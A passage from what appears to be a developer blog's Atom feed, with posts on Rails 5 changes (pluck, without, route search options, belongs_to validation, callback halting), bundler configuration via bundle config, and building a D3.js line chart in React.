=&gt; [[1, &quot;Max&quot;], [2, &quot;Mark&quot;], [3, &quot;George&quot;]]</code></pre><p>One great improvement in <code>ActiveRecord</code> due to this addition: when the relation is already loaded, calling <code>pluck</code> no longer fires a query and instead uses <code>Enumerable#pluck</code> on the loaded records.</p><pre><code class="language-ruby"># In Rails 4.x
users = User.all
SELECT `users`.* FROM `users`

users.pluck(:id, :name)
SELECT &quot;users&quot;.&quot;id&quot;, &quot;users&quot;.&quot;name&quot; FROM &quot;users&quot;
=&gt; [[2, &quot;Max&quot;], [3, &quot;Mark&quot;], [4, &quot;George&quot;]]

# In Rails 5
users = User.all
SELECT &quot;users&quot;.* FROM &quot;users&quot;

# does not fire any query
users.pluck(:id, :name)
=&gt; [[1, &quot;Max&quot;], [2, &quot;Mark&quot;], [3, &quot;George&quot;]]</code></pre><h3>without</h3><p><a href="https://github.com/rails/rails/pull/19157">This method</a> returns a copy of the enumerable without the elements passed to the method.</p><pre><code class="language-ruby">vehicles = ['Car', 'Bike', 'Truck', 'Bus']

vehicles.without(&quot;Car&quot;, &quot;Bike&quot;)
=&gt; [&quot;Truck&quot;, &quot;Bus&quot;]

vehicles = {car: 'Hyundai', bike: 'Honda', bus: 'Mercedes', truck: 'Tata'}

vehicles.without(:bike, :bus)
=&gt; {:car=&gt;&quot;Hyundai&quot;, :truck=&gt;&quot;Tata&quot;}</code></pre><h3>Array#second_to_last and Array#third_to_last</h3><pre><code class="language-ruby">['a', 'b', 'c', 'd', 'e'].second_to_last
=&gt; &quot;d&quot;

['a', 'b', 'c', 'd', 'e'].third_to_last
=&gt; &quot;c&quot;</code></pre><p>The PR for these methods can be found <a href="https://github.com/rails/rails/pull/23583">here</a>.</p><h3>Integer#positive? and Integer#negative?</h3><p><code>positive?</code> returns true if the number is positive.</p><p><code>negative?</code> returns true if the number is negative.</p><pre><code class="language-ruby">4.positive?
=&gt; true

4.negative?
=&gt; false

-4.0.positive?
=&gt; false

-4.0.negative?
=&gt; true</code></pre><p>The commit for these methods can be found <a href="https://github.com/rails/rails/commit/e54277a4">here</a>.</p><p>These methods have also been <a href="https://github.com/ruby/ruby/blob/a837be87fdf580ac4fd58c4cb2f1ee16bab11b99/NEWS#L127">added to Ruby 2.3</a>.</p><h3>Array#inquiry</h3><p>The Rails team has <a href="https://github.com/georgeclaghorn/rails/commit/c64b99ecc98341d504aced72448bee758f3cfdaf">added</a> <code>ArrayInquirer</code> to <code>ActiveSupport</code>, which gives a friendlier way to check an array's contents.</p><p><code>Array#inquiry</code> is a shortcut for wrapping the receiving array in an <code>ArrayInquirer</code>.</p><pre><code class="language-ruby">users = [:mark, :max, :david]

array_inquirer1 = ActiveSupport::ArrayInquirer.new(users)

# creates an ArrayInquirer object, same as array_inquirer1 above
array_inquirer2 = users.inquiry

array_inquirer2.class
=&gt; ActiveSupport::ArrayInquirer

# provides methods like:
array_inquirer2.mark?
=&gt; true

array_inquirer2.john?
=&gt; false

array_inquirer2.any?(:john, :mark)
=&gt; true

array_inquirer2.any?(:mark, :david)
=&gt; true

array_inquirer2.any?(:john, :louis)
=&gt; false</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 improves route search with advanced options]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-options-for-rake-routes"/>
      <updated>2016-02-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-options-for-rake-routes</id>
      <content type="html"><![CDATA[<p><code>rails routes</code> shows all the routes in the application.</p><pre><code class="language-bash">$ rake routes
       Prefix Verb   URI Pattern                   Controller#Action
wishlist_user GET    /users/:id/wishlist(.:format) users#wishlist
        users GET    /users(.:format)              users#index
              POST   /users(.:format)              users#create
     new_user GET    /users/new(.:format)          users#new
    edit_user GET    /users/:id/edit(.:format)     users#edit
         user GET    /users/:id(.:format)          users#show
              PATCH  /users/:id(.:format)          users#update
              PUT    /users/:id(.:format)          users#update
              DELETE /users/:id(.:format)          users#destroy
     products GET    /products(.:format)           products#index
              POST   /products(.:format)           products#create

and so on ......</code></pre><p>This list can be lengthy, and it can be difficult to locate exactly what the user is looking for.</p><h2>Ways to search specific routes prior to Rails 5</h2><p>To see only specific routes we can use commands like <code>grep</code>.</p><pre><code class="language-bash">$ rake routes | grep products
Prefix       Verb   URI Pattern                   Controller#Action
products      GET    /products(.:format)           products#index
              POST   /products(.:format)           products#create</code></pre><h2>Options with Rails 5</h2><p>Rails 5 <a href="https://github.com/rails/rails/pull/23225">has added</a> options to <code>rails routes</code> to perform pattern matching on routes.</p><h4>Controller specific search</h4><p>Use the <code>-c</code> option to search for routes related to a controller. Also remember that Rails does a case-insensitive search.
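</p><p>Conceptually, the <code>-c</code> and <code>-g</code> filters behave like the following plain-Ruby sketch. The route rows and helper names here are hypothetical, not Rails internals:</p>

```ruby
# Hypothetical route table rows: [prefix, verb, path, controller#action]
routes = [
  ["users",       "GET", "/users(.:format)",       "users#index"],
  ["admin_users", "GET", "/admin/users(.:format)", "admin/users#index"],
  ["products",    "GET", "/products(.:format)",    "products#index"],
]

# -c style: case-insensitive match on the controller part
def filter_by_controller(routes, name)
  routes.select { |row| row.last.split("#").first.casecmp(name).zero? }
end

# -g style: match the pattern against any column
def grep_routes(routes, pattern)
  regexp = Regexp.new(Regexp.escape(pattern), Regexp::IGNORECASE)
  routes.select { |row| row.any? { |column| regexp.match?(column) } }
end

p filter_by_controller(routes, "Users").size  # 1
p grep_routes(routes, "admin").size           # 1
```

<p>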
So <code>rails routes -c users</code> is the same as <code>rails routes -c Users</code>.</p><pre><code class="language-bash"># Search by controller name
$ rails routes -c users
       Prefix Verb   URI Pattern                   Controller#Action
wishlist_user GET    /users/:id/wishlist(.:format) users#wishlist
        users GET    /users(.:format)              users#index
              POST   /users(.:format)              users#create

# Search by namespaced controller name.
$ rails routes -c admin/users
         Prefix Verb   URI Pattern                     Controller#Action
    admin_users GET    /admin/users(.:format)          admin/users#index
                POST   /admin/users(.:format)          admin/users#create

# Search by namespaced controller class name.
$ rails routes -c Admin::UsersController
         Prefix Verb   URI Pattern                     Controller#Action
    admin_users GET    /admin/users(.:format)          admin/users#index
                POST   /admin/users(.:format)          admin/users#create</code></pre><h4>Pattern specific search</h4><p>Use the <code>-g</code> option to do <a href="https://github.com/rails/rails/pull/23611">general purpose</a> pattern matching. This returns any routes that partially match the Prefix, Controller#Action or the URI pattern.</p><pre><code class="language-bash"># Search with a pattern
$ rails routes -g wishlist
       Prefix Verb URI Pattern                   Controller#Action
wishlist_user GET  /users/:id/wishlist(.:format) users#wishlist

# Search with an HTTP verb
$ rails routes -g POST
    Prefix Verb URI Pattern            Controller#Action
           POST /users(.:format)       users#create
           POST /admin/users(.:format) admin/users#create
           POST /products(.:format)    products#create

# Search with a URI pattern
$ rails routes -g admin
       Prefix Verb   URI Pattern                     Controller#Action
  admin_users GET    /admin/users(.:format)          admin/users#index
              POST   /admin/users(.:format)          admin/users#create</code></pre><p>Note that using CONTROLLER=some_controller has now been deprecated. It had the same effect as searching for a controller-specific route.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 makes belongs_to association required by default]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-makes-belong-to-association-required-by-default"/>
      <updated>2016-02-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-makes-belong-to-association-required-by-default</id>
<content type="html"><![CDATA[<p>In Rails 5, whenever we define a <code>belongs_to</code> association, the associated record is required to be present by default, after <a href="https://github.com/rails/rails/pull/18937">this</a> change.</p><p>A validation error is triggered if the associated record is not present.</p><pre><code class="language-ruby">class User &lt; ApplicationRecordendclass Post &lt; ApplicationRecord  belongs_to :userendpost = Post.create(title: 'Hi')=&gt; &lt;Post id: nil, title: &quot;Hi&quot;, user_id: nil, created_at: nil, updated_at: nil&gt;post.errors.full_messages.to_sentence=&gt; &quot;User must exist&quot;</code></pre><p>As we can see, we can't create a <code>post</code> record without an associated <code>user</code> record.</p><h2>How to achieve this behavior before Rails 5</h2><p>In the Rails 4.x world, to add validation on a <code>belongs_to</code> association, we need to add the option <code>required: true</code>.</p><pre><code class="language-ruby">class User &lt; ApplicationRecordendclass Post &lt; ApplicationRecord  belongs_to :user, required: trueendpost = Post.create(title: 'Hi')=&gt; &lt;Post id: nil, title: &quot;Hi&quot;, user_id: nil, created_at: nil, updated_at: nil&gt;post.errors.full_messages.to_sentence=&gt; &quot;User must exist&quot;</code></pre><p>By default, the <code>required</code> option is set to <code>false</code>.</p><h2>Opting out of this default behavior in Rails 5</h2><p>We can pass <code>optional: true</code> to the <code>belongs_to</code> association, which removes this validation check.</p><pre><code class="language-ruby">class Post &lt; ApplicationRecord  belongs_to :user, optional: trueendpost = Post.create(title: 'Hi')=&gt; &lt;Post id: 2, title: &quot;Hi&quot;, user_id: nil&gt;</code></pre><p>But what if we do not need this behavior anywhere in our entire application, and not just in a single model?</p><h2>Opting out of this default behavior for the entire application</h2><p>A new Rails 5 application comes with an initializer named <code>new_framework_defaults.rb</code>.</p><p>When upgrading from an older version of Rails to Rails 5, we can add this initializer by running the <code>bin/rails app:update</code> task.</p><p>This initializer has a config named <code>Rails.application.config.active_record.belongs_to_required_by_default = true</code>.</p><p>For a new Rails 5 application the value is set to <code>true</code>, but for old applications it is set to <code>false</code> by default.</p><p>We can turn off this behavior by setting the value to <code>false</code>.</p><pre><code class="language-ruby">Rails.application.config.active_record.belongs_to_required_by_default = falseclass Post &lt; ApplicationRecord  belongs_to :userendpost = Post.create(title: 'Hi')=&gt; &lt;Post id: 3, title: &quot;Hi&quot;, user_id: nil, created_at: &quot;2016-02-11 12:36:05&quot;, updated_at: &quot;2016-02-11 12:36:05&quot;&gt;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 doesn't halt callback chain if false is returned]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-does-not-halt-callback-chain-when-false-is-returned"/>
      <updated>2016-02-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-does-not-halt-callback-chain-when-false-is-returned</id>
<content type="html"><![CDATA[<p>Before Rails 5, returning <code>false</code> from any <code>before_</code> callback in <code>ActiveModel</code>, <code>ActiveModel::Validations</code>, <code>ActiveRecord</code> and <code>ActiveSupport</code> resulted in halting of the callback chain.</p><pre><code class="language-ruby">class Order &lt; ActiveRecord::Base  before_save :set_eligibility_for_rebate  before_save :ensure_credit_card_is_on_file  def set_eligibility_for_rebate    self.eligibility_for_rebate ||= false  end  def ensure_credit_card_is_on_file    puts &quot;check if credit card is on file&quot;  endendOrder.create!=&gt; ActiveRecord::RecordNotSaved: ActiveRecord::RecordNotSaved</code></pre><p>In this case the code is attempting to set the value of <code>eligibility_for_rebate</code> to false. However, a side effect of the way Rails callbacks work is that the callback chain is halted simply because one of the callbacks returned <code>false</code>.</p><p>Before Rails 5, to fix this we need to return <code>true</code> from <code>before_</code> callbacks, so that the callback chain is not halted.</p><h2>Improvements in Rails 5</h2><p>Rails 5 fixed this issue <a href="https://github.com/rails/rails/pull/17227">by adding</a> <code>throw(:abort)</code> to explicitly halt callbacks.</p><p>Now, if any <code>before_</code> callback returns <code>false</code>, the callback chain is not halted.</p><pre><code class="language-ruby">class Order &lt; ActiveRecord::Base  before_save :set_eligibility_for_rebate  before_save :ensure_credit_card_is_on_file  def set_eligibility_for_rebate    self.eligibility_for_rebate ||= false  end  def ensure_credit_card_is_on_file    puts &quot;check if credit card is on file&quot;  endendOrder.create!=&gt; check if credit card is on file=&gt; &lt;Order id: 4, eligibility_for_rebate: false&gt;</code></pre><p>To explicitly halt the callback chain, we need to use <code>throw(:abort)</code>.</p><pre><code class="language-ruby">class Order &lt; ActiveRecord::Base  before_save :set_eligibility_for_rebate  before_save :ensure_credit_card_is_on_file  def set_eligibility_for_rebate    self.eligibility_for_rebate ||= false    throw(:abort)  end  def ensure_credit_card_is_on_file    puts &quot;check if credit card is on file&quot;  endendOrder.create!=&gt; ActiveRecord::RecordNotSaved: Failed to save the record</code></pre><h2>Opting out of this behavior</h2><p>A new Rails 5 application comes with an initializer named <code>callback_terminator.rb</code>.</p><p><code>ActiveSupport.halt_callback_chains_on_return_false = false</code></p><p>By default the value is set to <code>false</code>.</p><p>We can turn off this new default behavior by changing the configuration to <code>true</code>. However, Rails then shows a deprecation warning when <code>false</code> is returned from a callback.</p><pre><code class="language-ruby">ActiveSupport.halt_callback_chains_on_return_false = trueclass Order &lt; ApplicationRecord  before_save :set_eligibility_for_rebate  before_save :ensure_credit_card_is_on_file  def set_eligibility_for_rebate    self.eligibility_for_rebate ||= false  end  def ensure_credit_card_is_on_file    puts &quot;check if credit card is on file&quot;  endend=&gt; DEPRECATION WARNING: Returning `false` in Active Record and Active Model callbacks will not implicitly halt a callback chain in the next release of Rails. To explicitly halt the callback chain, please use `throw :abort` instead.ActiveRecord::RecordNotSaved: Failed to save the record</code></pre><h2>How will older applications work with this change?</h2><p>The initializer configuration will be present only in newly generated Rails 5 apps.</p><p>If you are upgrading from an older version of Rails, you can add this initializer yourself to enable this change for the entire application.</p><p>This is a welcome change in Rails 5 which will help prevent accidental halting of callbacks.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Configuring bundler using bundle config]]></title>
       <author><name>Prajakta Tambe</name></author>
      <link href="https://www.bigbinary.com/blog/configuring-bundler-using-bundle-config"/>
      <updated>2016-02-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/configuring-bundler-using-bundle-config</id>
<content type="html"><![CDATA[<p><a href="http://bundler.io/">Bundler</a> helps in managing gem dependencies of Ruby projects. You can specify which gems and versions you need; bundler will install them and load them at runtime. Bundler ensures that the gems you need are present in the environment you need.</p><h2>Bundle configurations</h2><p>Bundler gets its configurations from the local application <code>(app/.bundle/config)</code>, <code>environment variables</code> and the user's home directory <code>(~/.bundle/config)</code>, in that order of priority.</p><p>To list all bundler configurations for the current bundle, run bundle config without any parameters. You will also get the location where each value is set.</p><pre><code class="language-plaintext">$ bundle configSettings are listed in order of priority. The top value will be used.</code></pre><p>You might see different results based on the configuration of bundler on your machine.</p><p>To get the value of a specific configuration setting, run bundle config with its name.</p><pre><code class="language-plaintext">$ bundle config disable_multisourceSettings for `disable_multisource` in order of priority. The top value will be usedYou have not configured a value for `disable_multisource`</code></pre><h2>Setting Configuration</h2><p>To set the value of a configuration setting, use bundle config with the name and value. The configuration will be stored in <code>~/.bundle/config</code>.</p><pre><code class="language-plaintext">$ bundle config build.pg --with-pg-config=/opt/local/lib/postgresql91/bin/pg_config$ bundle configSettings are listed in order of priority. The top value will be used.build.pgSet for the current user (/Users/username/.bundle/config): &quot;--with-pg-config=/opt/local/lib/postgresql91/bin/pg_config&quot;</code></pre><p>If a config already has a value, it will be overwritten directly and the user will be warned.</p><pre><code class="language-plaintext">$ bundle config build.pg --with-pg-config=/usr/pgsql-9.1/bin/pg_configYou are replacing the current global value of build.pg, which is currently &quot;--with-pg-config=/opt/local/lib/postgresql91/bin/pg_config&quot;</code></pre><h2>Application level configuration</h2><p>By default, setting a configuration value sets it for all projects on the machine. You can set configurations specific to the local application with the <code>--local</code> option. This will store the value in <code>app/.bundle/config</code>.</p><pre><code class="language-plaintext">$ bundle config --local auto_install falseYou are replacing the current local value of auto_install, which is currently nil$ bundle config auto_installSettings for `auto_install` in order of priority. The top value will be usedSet for your local app (/Users/username/Documents/Workspace/app-name/.bundle/config): &quot;false&quot;Set for the current user (/Users/username/.bundle/config): &quot;true&quot;</code></pre><p>You can also run bundle config with <code>--global</code>. This will set values at the global level, i.e. across all applications on the machine. It is similar to running bundle config without any options.</p><h2>Deleting configuration</h2><p>You can delete a configuration with the <code>--delete</code> option.</p><pre><code class="language-plaintext">$ bundle config --delete auto_install$ bundle configSettings are listed in order of priority. 
The top value will be used.disable_multisourceSet for the current user (/Users/username/.bundle/config): &quot;true&quot;build.pgSet for the current user (/Users/username/.bundle/config): &quot;--with-pg-config=/usr/pgsql-9.1/bin/pg_config&quot;</code></pre><p>The <code>--delete</code> option is not compatible with <code>--local</code> and <code>--global</code>; it deletes the configuration from both local and global sources.</p><h2>Build Options</h2><p>You can pass the flags required for installing a particular gem to bundler with bundle config.</p><p>Many El Capitan users face an <a href="http://stackoverflow.com/questions/30818391/gem-eventmachine-fatal-error-openssl-ssl-h-file-not-found">issue</a> while installing the <code>eventmachine</code> gem. The issue can be resolved by providing the path to the OpenSSL include directory while installing <code>eventmachine</code>.</p><pre><code class="language-plaintext">$ gem install eventmachine -v '1.0.8' -- --with-cppflags=-I/usr/local/opt/openssl/include</code></pre><p>As this location will vary from machine to machine, we can set it with bundle config.</p><pre><code class="language-plaintext">$ bundle config build.eventmachine --with-cppflags=-I/usr/local/opt/openssl/include</code></pre><p>Now bundler will pick this configuration while installing the <code>eventmachine</code> gem.</p><h2>Configuration keys</h2><p>Various configuration keys are available with bundler. These keys come in two forms: you can specify them in canonical form with <code>bundle config</code>, or set them in environment variable form. Following are the canonical forms and their usage. Corresponding environment variables are specified in brackets.</p><h4>auto_install</h4><p>Setting the auto_install config enables automatic installation of gems instead of raising an error. This applies to the <code>show</code>, <code>binstubs</code>, <code>outdated</code>, <code>exec</code>, <code>open</code>, <code>console</code>, <code>license</code> and <code>clean</code> commands.</p><p>For example, when you try to run <code>bundle show</code> for a gem which is not yet installed, you will get an error.</p><pre><code class="language-plaintext">$ bundle show pgCould not find gem 'pg'.</code></pre><p>You can set <code>auto_install</code> to remove this error and install the gem.</p><pre><code class="language-plaintext">$ bundle config auto_install true$ bundle show pg# Gem will get installed/Users/username/.rvm/gems/ruby-2.2.2@gemset-auto/gems/pg-0.17.1</code></pre><h4>path (BUNDLE_PATH)</h4><p>You can specify the location where your gems are installed. The default path is $GEM_HOME in development, and vendor/bundle when --deployment is used.</p><pre><code class="language-plaintext">$ bundle config path NEW_PATH$ bundle install# Gems will get installed##Bundle complete! 4 Gemfile dependencies, 35 gems now installed.Bundled gems are installed into NEW_PATH.</code></pre><h4>frozen (BUNDLE_FROZEN)</h4><p>You can freeze changes to your Gemfile.</p><pre><code class="language-plaintext">$ bundle config frozen true</code></pre><p>If frozen is set and you try to run <code>bundle install</code> with a changed Gemfile, you will get the following warning.</p><pre><code class="language-plaintext">You are trying to install in deployment mode after changing your Gemfile. Run `bundle install` elsewhere and add the updated Gemfile.lock to version control.If this is a development machine, remove the /Users/username/Documents/Workspace/app-name/Gemfile freeze by running `bundle install --no-deployment`.You have added to the Gemfile:* minitest-reporters</code></pre><h4>without (BUNDLE_WITHOUT)</h4><p>You can skip installing groups of gems with bundle install. 
Specify a <code>:</code> separated list of group names whose gems bundler should not install.</p><pre><code class="language-plaintext">$ bundle config --local without development:test$ bundle install# This will install gems skipping development and test group gems.</code></pre><h4>bin (BUNDLE_BIN)</h4><p>You can set the directory where executables from gems in the bundle are installed.</p><pre><code class="language-plaintext">$ bundle config bin NEW_PATH$ bundle install# This will install executables in NEW_PATH</code></pre><h4>gemfile (BUNDLE_GEMFILE)</h4><p>You can set the file which bundler should use as the Gemfile. By default, bundler will use <code>Gemfile</code>. The location of this file also sets the root of the project, which is used to resolve relative paths in the Gemfile.</p><pre><code class="language-plaintext">$ bundle config gemfile Gemfile-rails4$ bundle install# This will install gems from the Gemfile-rails4 file.</code></pre><h4>ssl_ca_cert (BUNDLE_SSL_CA_CERT)</h4><p>This specifies the path to a designated CA certificate file, or a folder containing multiple certificates for trusted CAs, in PEM format. You can specify your own <code>https</code> sources in the Gemfile with corresponding certificates specified via <code>bundle config</code>.</p><pre><code class="language-plaintext">$ bundle config ssl_ca_cert NEW_CERTIFICATE_PATH</code></pre><h4>ssl_client_cert (BUNDLE_SSL_CLIENT_CERT)</h4><p>This specifies the path to a designated file containing an X.509 client certificate and key in PEM format.</p><pre><code class="language-plaintext">$ bundle config ssl_client_cert NEW_CERTIFICATE_PATH</code></pre><h4>cache_path (BUNDLE_CACHE_PATH)</h4><p>You can set the path where cached gems are placed when running bundle package.</p><pre><code class="language-plaintext">$ bundle config cache_path vendor/new-cache-path$ bundle packageUsing colorize 0.7.7Using pg 0.17.1Using bundler 1.11.2Updating files in vendor/new-cache-path  * colorize-0.7.7.gem  * pg-0.17.1.gemBundle complete! 2 Gemfile dependencies, 3 gems now installed.Use `bundle show [gemname]` to see where a bundled gem is installed.Updating files in vendor/new-cache-path</code></pre><h4>disable_multisource (BUNDLE_DISABLE_MULTISOURCE)</h4><p>When set, Gemfiles containing multiple sources will produce an error instead of a warning.</p><p>With this Gemfile,</p><pre><code class="language-plaintext">source 'https://rubygems.org'source 'http://gems.github.com'ruby '2.2.2'</code></pre><p>when you try to run <code>bundle install</code>, you will get a warning.</p><pre><code class="language-plaintext">$ bundle installWarning: this Gemfile contains multiple primary sources. Using `source` more than once without a block is a security risk, and may result in installing unexpected gems. To resolve this warning, use a block to indicate which gems should come from the secondary source. To upgrade this warning to an error, run `bundle config disable_multisource true`.</code></pre><pre><code class="language-plaintext">$ bundle config --local disable_multisource true$ bundle install[!] There was an error parsing `Gemfile`: Warning: this Gemfile contains multiple primary sources. Each source after the first must include a block to indicate which gems should come from that source. To downgrade this error to a warning, run `bundle config --delete disable_multisource`. Bundler cannot continue. #  from /Users/username/Documents/Workspace//Gemfile:2 #  ------------------------------------------- #  source 'https://rubygems.org' &gt;  source 'http://gems.github.com' # #  -------------------------------------------</code></pre><p>To ignore all bundler configuration on the machine when running bundle install, set the <code>BUNDLE_IGNORE_CONFIG</code> environment variable.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using D3 JS with React JS]]></title>
       <author><name>Akshay Mohite</name></author>
      <link href="https://www.bigbinary.com/blog/using-d3-js-with-react-js"/>
      <updated>2016-02-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-d3-js-with-react-js</id>
<content type="html"><![CDATA[<p>In this blog, we will see how to plot a simple line chart using ReactJS and D3.js.</p><p>If you are not familiar with ReactJS, please take a look at the <a href="https://facebook.github.io/react/">official ReactJS webpage</a>. You can also look at our <a href="https://bigbinary.com/videos/learn-reactjs-in-steps">Learn ReactJS in steps video series</a>.</p><h2>What is D3.js</h2><p><a href="http://d3js.org/">D3.js</a> is a JavaScript library used to create interactive, dynamic visualizations.</p><p>Let's take a step-by-step look at how we can integrate ReactJS with D3.js to plot some interactive visualizations.</p><h2>Step 1 - Get ReactJS example working</h2><p>We will be using the <a href="https://jsfiddle.net/reactjs/69z2wepo/">JSFiddle example</a> from the <a href="https://facebook.github.io/react/docs/getting-started.html">ReactJS Docs</a> to begin with. Fork the JSFiddle example and you should be good to go.</p><h2>Step 2 - Add D3.js as an external resource</h2><p>We will be using <a href="https://cdnjs.cloudflare.com/ajax/libs/d3/3.5.12/d3.js">D3.js</a> from the Cloudflare CDN. Add D3.js as an external resource as shown in the image given below, using the following URL.</p><pre><code class="language-plaintext">https://cdnjs.cloudflare.com/ajax/libs/d3/3.5.12/d3.js</code></pre><p><img src="/blog_images/2016/using-d3-js-with-react-js/add-d3-js-as-an-external-resource.png" alt="Add D3 js as an external resource"></p><h2>Step 3 - Build ReactJS components to create visualizations with D3.js</h2><p>Now let's try to draw a line chart using D3.js.</p><p>Let's create a <code>Line</code> component that renders a line path for the data points provided.</p><pre><code class="language-javascript">const Line = React.createClass({  propTypes: {    path: React.PropTypes.string.isRequired,    stroke: React.PropTypes.string,    fill: React.PropTypes.string,    strokeWidth: React.PropTypes.number,  },  getDefaultProps() {    return {      stroke: &quot;blue&quot;,      fill: &quot;none&quot;,      strokeWidth: 3,    };  },  render() {    let { path, stroke, fill, strokeWidth } = this.props;    return (      &lt;path d={path} fill={fill} stroke={stroke} strokeWidth={strokeWidth} /&gt;    );  },});</code></pre><p>Here in the above code, the <code>Line</code> component renders an <a href="https://developer.mozilla.org/en-US/docs/Web/SVG/Element/path">SVG path</a>. <a href="https://www.w3.org/TR/SVG/paths.html#DAttribute">Path data</a> <code>d</code> is generated using <a href="https://github.com/mbostock/d3/wiki/API-Reference#paths">D3 path functions</a>.</p><p>Let's create another component, <code>DataSeries</code>, that will render a <code>Line</code> component for each series of data provided. 
This generates <code>path</code> based on the <code>xScale</code> and <code>yScale</code> generated for plotting a line chart.</p><pre><code class="language-javascript">const DataSeries = React.createClass({  propTypes: {    colors: React.PropTypes.func,    data: React.PropTypes.object,    interpolationType: React.PropTypes.string,    xScale: React.PropTypes.func,    yScale: React.PropTypes.func,  },  getDefaultProps() {    return {      data: [],      interpolationType: &quot;cardinal&quot;,      colors: d3.scale.category10(),    };  },  render() {    let { data, colors, xScale, yScale, interpolationType } = this.props;    let line = d3.svg      .line()      .interpolate(interpolationType)      .x(d =&gt; {        return xScale(d.x);      })      .y(d =&gt; {        return yScale(d.y);      });    let lines = data.points.map((series, id) =&gt; {      return &lt;Line path={line(series)} stroke={colors(id)} key={id} /&gt;;    });    return (      &lt;g&gt;        &lt;g&gt;{lines}&lt;/g&gt;      &lt;/g&gt;    );  },});</code></pre><p>Here in the above code, <a href="https://github.com/mbostock/d3/wiki/SVG-Shapes#line">d3.svg.line</a> creates a new line generator which expects its input as a two-element array of numbers.</p><p>Now we will create a <code>LineChart</code> component that will calculate <code>xScale</code> and <code>yScale</code> based on the data, and will render <code>DataSeries</code>, passing it <code>xScale</code>, <code>yScale</code>, <code>data</code> (input x,y values), and the width and height of the chart.</p><pre><code class="language-javascript">const LineChart = React.createClass({  propTypes: {    width: React.PropTypes.number,    height: React.PropTypes.number,    data: React.PropTypes.object.isRequired,  },  getDefaultProps() {    return {      width: 600,      height: 300,    };  },  render() {    let { width, height, data } = this.props;    let xScale = d3.scale      .ordinal()      .domain(data.xValues)      .rangePoints([0, width]);    let yScale = d3.scale      .linear()   
   .range([height, 10])      .domain([data.yMin, data.yMax]);    return (      &lt;svg width={width} height={height}&gt;        &lt;DataSeries          xScale={xScale}          yScale={yScale}          data={data}          width={width}          height={height}        /&gt;      &lt;/svg&gt;    );  },});</code></pre><p>Here <a href="https://github.com/mbostock/d3/wiki/Ordinal-Scales#ordinal">d3.scale.ordinal</a> constructs an ordinal scale that can have a discrete domain, while <a href="https://github.com/mbostock/d3/wiki/Quantitative-Scales#linear">d3.scale.linear</a> constructs a <a href="https://en.wikipedia.org/wiki/Linear_scale">linear quantitative scale</a>.</p><p>You can learn more about D3 quantitative scales <a href="https://github.com/mbostock/d3/wiki/Quantitative-Scales">here</a>.</p><p>Now we need to render the <code>LineChart</code> component with the data.</p><pre><code class="language-javascript">let data = {  points: [    [      { x: 0, y: 20 },      { x: 1, y: 30 },      { x: 2, y: 10 },      { x: 3, y: 5 },      { x: 4, y: 8 },      { x: 5, y: 15 },      { x: 6, y: 10 },    ],    [      { x: 0, y: 8 },      { x: 1, y: 5 },      { x: 2, y: 20 },      { x: 3, y: 12 },      { x: 4, y: 4 },      { x: 5, y: 6 },      { x: 6, y: 2 },    ],    [      { x: 0, y: 0 },      { x: 1, y: 5 },      { x: 2, y: 8 },      { x: 3, y: 2 },      { x: 4, y: 6 },      { x: 5, y: 4 },      { x: 6, y: 2 },    ],  ],  xValues: [0, 1, 2, 3, 4, 5, 6],  yMin: 0,  yMax: 30,};ReactDOM.render(  &lt;LineChart data={data} width={600} height={300} /&gt;,  document.getElementById(&quot;container&quot;));</code></pre><p>The element with id <code>container</code> is replaced with the content rendered by <code>LineChart</code>.</p><p>If we take a look at the output now, we see how the line chart gets plotted.</p><p><img src="/blog_images/2016/using-d3-js-with-react-js/react-js-d3-js-line-chart-example.png" alt="ReactJS + D3.js Line Chart example"></p><p>To build complex visualizations in a modularized fashion, we can use one of the open source libraries mentioned below, based on their advantages and disadvantages.</p><h2>ReactJS + D3.js Open Source Projects</h2><p>Here are two popular open source ReactJS + D3.js projects.</p><h4><a href="https://github.com/esbullington/react-d3">react-d3</a></h4><p><strong>Pros</strong></p><ul><li>Supports Bar chart, Line chart, Area chart, Pie chart, Candlestick chart, Scatter chart and Treemap.</li><li>Legend support.</li><li>Tooltips support.</li></ul><p><strong>Cons</strong></p><ul><li>No support for animations. You can implement animations using <a href="https://github.com/mbostock/d3/wiki/API-Reference#transitions">D3 Transitions</a>.</li><li>Only stacked Bar chart support.</li></ul><h4><a href="https://github.com/codesuki/react-d3-components">react-d3-components</a></h4><p><strong>Pros</strong></p><ul><li>Custom <a href="https://github.com/mbostock/d3/wiki/API-Reference#d3scale-scales">scales</a> support.</li><li>Supports Bar chart (Stacked, Grouped), Line chart, Area chart, Pie chart, Scatter chart.</li><li>Tooltips support.</li></ul><p><strong>Cons</strong></p><ul><li>No Legend support.</li><li>No support for animations.</li></ul><h3>Summary</h3><p>Below is the final working example of the JSFiddle built in this post: <a href="https://jsfiddle.net/ad4od45f/7/">ReactJS + D3.js line chart example</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Caching result sets and collection in Rails 5]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/activerecord-relation-cache-key"/>
      <updated>2016-02-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/activerecord-relation-cache-key</id>
